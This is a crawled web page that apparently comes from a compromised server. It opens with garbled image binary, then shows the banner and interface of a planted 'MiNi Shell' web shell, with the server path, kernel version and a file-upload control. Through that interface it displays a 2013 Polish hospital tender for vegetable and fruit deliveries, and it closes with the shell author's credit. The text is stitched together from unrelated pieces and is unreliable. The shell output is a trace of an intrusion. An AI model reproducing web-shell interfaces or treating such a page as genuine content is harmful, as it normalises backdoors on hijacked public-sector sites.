JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130219/26147-N-2013.html

<p class="kh_header"><b>Kraków: DOSTAWY WARZYW I OWOCÓW</b><br>
<b>Numer ogłoszenia: 26147 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny ZOZ , ul. Wrocławska 1-3, 30-901 Kraków, woj. małopolskie, tel. 12 63 08 099, faks 12 63 08 099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wszk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWY WARZYW I OWOCÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET nr I. Warzywa całoroczne


LP	Szczegółowa nazwa przedmiotu zamówienia 
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość /j.m. (op.)	kwota netto
za j.m. (op.)	wartość netto

	VAT	wartość brutto
1.	Ziemniaki jadalne                          (opakowanie zbiorcze 30 kg)	03212100-1	1 960 op.				
2.	Burak ćwikłowy
(opakowanie zbiorcze 15 kg)	03221111-7	430 op.				
3.	 Marchew świeża
(opakowanie zbiorcze 10 kg)	03221112-4	1700 op.				
4.	Kapusta biała-świeża 
(opakowanie zbiorcze 25 kg)	03221410-3	44 op.				
5.	Kapusta czerwona-świeża, 
(opakowanie zbiorcze 25 kg) 	03221410-3	26 op.				
6.	Kapusta włoska- świeża 
(opakowanie zbiorcze 25 kg)	03221410-3	25op.				
7.	Kapusta pekińska 
(opakowanie zbiorcze 15 kg)	03221410-3	38 op.				
8.	Kapusta brukselka świeża
(opakowanie zbiorcze 5 kg)	03221440-2	20 op.				
9.	Seler świeży,
(opakowanie zbiorcze 10 kg) 	03221120-3
	705op.				
10.	Por świeży,
(opakowanie zbiorcze 5 kg)	03221300-9	215 op.				
11.	Cebula świeża,
(opakowanie zbiorcze 15 kg)	03221113-1	135 op.				
12.	Pietruszka świeża-korzeń,
(opakowanie zbiorcze 10 kg)	03221110-0	705 op.				
13.	Czosnek świeży,
(opakowanie zbiorcze 2 kg)	03221120-3	60 op.				
14.	Pieczarka uprawna świeża                    (opakowanie zbiorcze 4kg)	03221260-6	120op.				
	RAZEM						

PAKIET nr II. Warzywa - kiszonki


LP	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość /j.m. (op.)	kwota netto
za j.m. (op.)	wartość netto

	VAT	wartość brutto
1.	Ogórki kwaszone 
(opakowanie zbiorcze - 3 kg)	13221270-9	350 op.				
2.	Kapusta kwaszona 
(opakowanie zbiorcze - 10 kg)	15331142-4	150 op.				
	RAZEM						






PAKIET nr III. Warzywa sezonowe

LP.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość/j.m. (kg.)	kwota netto
za j.m. (kg.)	wartość netto
	VAT	wartość brutto
1.	Fasolka szparagowa świeża kl. I	03221212-5	180 kg				
2.	Pomidory świeże kl. I	03221240-0	460 kg				
3.	Ogórki świeże kl. I	03221270-9	270 kg				
4.	Sałata głowiasta kl. I	03221310-2	1350szt				
5.	Sałata lodowa kl. I	03221310-2	500 szt.				
6.	Kalafior świeży kl. I	03221420-6	500 szt.				
7.	Brokuł świeży kl. I	03221420-6	800 szt.				
8.	Rzodkiewka kl. I 	03221110-0	120 kg				
9.	Natka pietruszki świeża	03221300-9	120 kg				
10.	Koper zielony świeży	03221300-9	200 kg				
11.	Szczypior świeży	03221300-9	50 kg				
12.	Papryka świeża kl. I	03221230-7	25 kg				
13.	Rabarbar świeży	03221200-8	150 kg				
14.	Botwinka świeża	03221111-7	150 kg				
	RAZEM						

PAKIET nr IV. Owoce krajowe

Lp.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość/j.m. (op.)	kwota netto
za j.m. (op.)	wartość netto
	VAT	wartość brutto
1.	Jabłko deserowe konsumpcyjne,
(opakowanie zbiorcze 15 kg)	03222321-9	840 op.				
	RAZEM						

PAKIET nr V. Owoce cytrusowe

LP.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość/j.m. (Kg.)	kwota netto
za j.m. (Kg.)	wartość netto
	VAT	wartość brutto
1.	Pomarańcza                                                                 /waga 1 szt. = około 250g/, (opakowanie zbiorcze 5-10kg)	03222220-1	600 kg				
2.	Grapefruit                                          /waga 1 szt. = około 400g/,                                                               (opakowanie zbiorcze 9-18 kg	03222230-4	648 kg				
3.	Mandarynka                                                                                               /waga 1 szt. = około 150 g/,                                                                      (opakowanie zbiorcze 4.5-12kg)	03222240-7	36 kg				
4.	Cytryna                                                                           (opakowanie zbiorcze 1-5 kg)	03222210-8	110 kg				
	RAZEM.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dotyczącego sytuacji ekonomicznej, o udzielenie zamówienia mogą się ubiegać wykonawcy, posiadający polisę ubezpieczeniową od odpowiedzialności cywilnej (deliktowej) z rozszerzonym zakresem ubezpieczenia od odpowiedzialności cywilnej ubezpieczonego za szkody osobowe lub rzeczowe wyrządzone przez produkty dostarczone przez Sprzedającego.
W zakresie warunku dotyczącego sytuacji finansowej, Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony FORMULARZ OFERTOWY - według ZAŁĄCZNIKA NR 2 do SIWZ.
2.	Podpisany i wypełniony we wskazanych miejscach FORMULARZ CENOWY - OPIS PRZEDMIOTU ZAMÓWIENIA - według ZAŁĄCZNIKA NR 1 do SIWZ.
3.	Pełnomocnictwo umocowujące przynajmniej w zakresie podpisania oferty w postępowaniu o udzielenie zamówienia publicznego, dołączone do oferty, o ile nie wynika z innych dokumentów, załączonych przez Wykonawcę
4.	Oświadczenie Wykonawcy, w trybie art. 44 ustawy, dotyczące spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy, ściśle według formularza stanowiącego ZAŁĄCZNIK NR 3 do SIWZ, a także ZAŁĄCZNIK NR 3A i co za tym idzie pisemne celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (o ile dotyczy).
5.	Oświadczenie Wykonawcy dotyczące niepodlegania wykluczeniu ściśle według formularza stanowiącego ZAŁĄCZNIKIEM NR 4 do SIWZ. 
6.	Aktualny odpis z właściwego rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, jeżeli odrębne przepisy wymagają wpisu do rejestru.
7.	Zaświadczenie o wpisie do rejestru zakładów zgodne z rozporządzeniem Ministra Zdrowia z dnia 29 maja 2007 roku w sprawie wzorów dokumentów dotyczących rejestracji i zatwierdzenia zakładów produkcyjnych lub wprowadzających do obrotu żywność, podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej (Dz. U. z 20007 t. Nr 106, poz. 730) - jeżeli DOTYCZY.
8.	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 6 składa odpowiedni dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
9.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 8, zastępuje się je dokumentem zawierającym oświadczenie Wykonawcy złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - w zakresie dat wystawienia dokumentów, przepisy punktu 8 stosuje się odpowiednio</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:
1)	Zmiany świadczenia Wykonawcy na świadczenie lepszej jakości przy zachowaniu tożsamości usługi.
2)	Wydłużenia terminu wykonania umowy z powodu okoliczności niezależnych od Wykonawcy,
3)	Zmiany danych Wykonawcy ( np. zmiana siedziby, adresu, nazwy).
4)	Działania siły wyższej lub wystąpienia stanu wyższej konieczności
5)	Zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe.
6)	Zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia.
7)	Omyłek pisarskich lub błędów rachunkowych.
8)	Mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami.
9)	Jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego.
10)	Innych zmian korzystnych dla Zamawiającego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wszk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamówienia Publiczne, (budynek Komendy), ul. Wrocławska 1-3, 30 - 901 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2013 godzina 11:00, miejsce: Kancelaria Szpitala, (budynek komendy), ul. Wrocławska 1-3, 30 - 901 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET nr I. Warzywa całoroczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Szczegółowa nazwa przedmiotu zamówienia 
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość /j.m. (op.)	kwota netto
za j.m. (op.)	wartość netto

	VAT	wartość brutto
1.	Ziemniaki jadalne                          (opakowanie zbiorcze 30 kg)	03212100-1	1 960 op.				
2.	Burak ćwikłowy
(opakowanie zbiorcze 15 kg)	03221111-7	430 op.				
3.	 Marchew świeża
(opakowanie zbiorcze 10 kg)	03221112-4	1700 op.				
4.	Kapusta biała-świeża 
(opakowanie zbiorcze 25 kg)	03221410-3	44 op.				
5.	Kapusta czerwona-świeża, 
(opakowanie zbiorcze 25 kg) 	03221410-3	26 op.				
6.	Kapusta włoska- świeża 
(opakowanie zbiorcze 25 kg)	03221410-3	25op.				
7.	Kapusta pekińska 
(opakowanie zbiorcze 15 kg)	03221410-3	38 op.				
8.	Kapusta brukselka świeża
(opakowanie zbiorcze 5 kg)	03221440-2	20 op.				
9.	Seler świeży,
(opakowanie zbiorcze 10 kg) 	03221120-3
	705op.				
10.	Por świeży,
(opakowanie zbiorcze 5 kg)	03221300-9	215 op.				
11.	Cebula świeża,
(opakowanie zbiorcze 15 kg)	03221113-1	135 op.				
12.	Pietruszka świeża-korzeń,
(opakowanie zbiorcze 10 kg)	03221110-0	705 op.				
13.	Czosnek świeży,
(opakowanie zbiorcze 2 kg)	03221120-3	60 op.				
14.	Pieczarka uprawna świeża                    (opakowanie zbiorcze 4kg)	03221260-6	120op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.14.10-3, 03.21.21.00-1, 03.22.11.11-7, 03.22.11.12-4, 03.22.11.20-3, 03.22.13.00-9, 03.22.11.10-0, 03.22.12.60-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET nr II. Warzywa - kiszonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość /j.m. (op.)	kwota netto
za j.m. (op.)	wartość netto

	VAT	wartość brutto
1.	Ogórki kwaszone 
(opakowanie zbiorcze - 3 kg)	13221270-9	350 op.				
2.	Kapusta kwaszona 
(opakowanie zbiorcze - 10 kg)	15331142-4	150 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.42-4, 13.22.12.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET nr III. Warzywa sezonowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość/j.m. (kg.)	kwota netto
za j.m. (kg.)	wartość netto
	VAT	wartość brutto
1.	Fasolka szparagowa świeża kl. I	03221212-5	180 kg				
2.	Pomidory świeże kl. I	03221240-0	460 kg				
3.	Ogórki świeże kl. I	03221270-9	270 kg				
4.	Sałata głowiasta kl. I	03221310-2	1350szt				
5.	Sałata lodowa kl. I	03221310-2	500 szt.				
6.	Kalafior świeży kl. I	03221420-6	500 szt.				
7.	Brokuł świeży kl. I	03221420-6	800 szt.				
8.	Rzodkiewka kl. I 	03221110-0	120 kg				
9.	Natka pietruszki świeża	03221300-9	120 kg				
10.	Koper zielony świeży	03221300-9	200 kg				
11.	Szczypior świeży	03221300-9	50 kg				
12.	Papryka świeża kl. I	03221230-7	25 kg				
13.	Rabarbar świeży	03221200-8	150 kg				
14.	Botwinka świeża	03221111-7	150 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.11-7, 03.22.13.10-2, 03.22.14.20-6, 03.22.12.70-9, 03.22.12.12-5, 03.22.13.10-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET nr IV. Owoce krajowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość/j.m. (op.)	kwota netto
za j.m. (op.)	wartość netto
	VAT	wartość brutto
1.	Jabłko deserowe konsumpcyjne,
(opakowanie zbiorcze 15 kg)	03222321-9	840 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.23.21-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET nr V. Owoce cytrusowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET nr V. Owoce cytrusowe

LP.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość/j.m. (Kg.)	kwota netto
za j.m. (Kg.)	wartość netto
	VAT	wartość brutto
1.	Pomarańcza                                                                 /waga 1 szt. = około 250g/, (opakowanie zbiorcze 5-10kg)	03222220-1	600 kg				
2.	Grapefruit                                          /waga 1 szt. = około 400g/,                                                               (opakowanie zbiorcze 9-18 kg	03222230-4	648 kg				
3.	Mandarynka                                                                                               /waga 1 szt. = około 150 g/,                                                                      (opakowanie zbiorcze 4.5-12kg)	03222240-7	36 kg				
4.	Cytryna                                                                           (opakowanie zbiorcze 1-5 kg)	03222210-8	110 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.22.10-8, 03.22.22.40-7, 03.22.22.30-4, 03.22.22.20-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com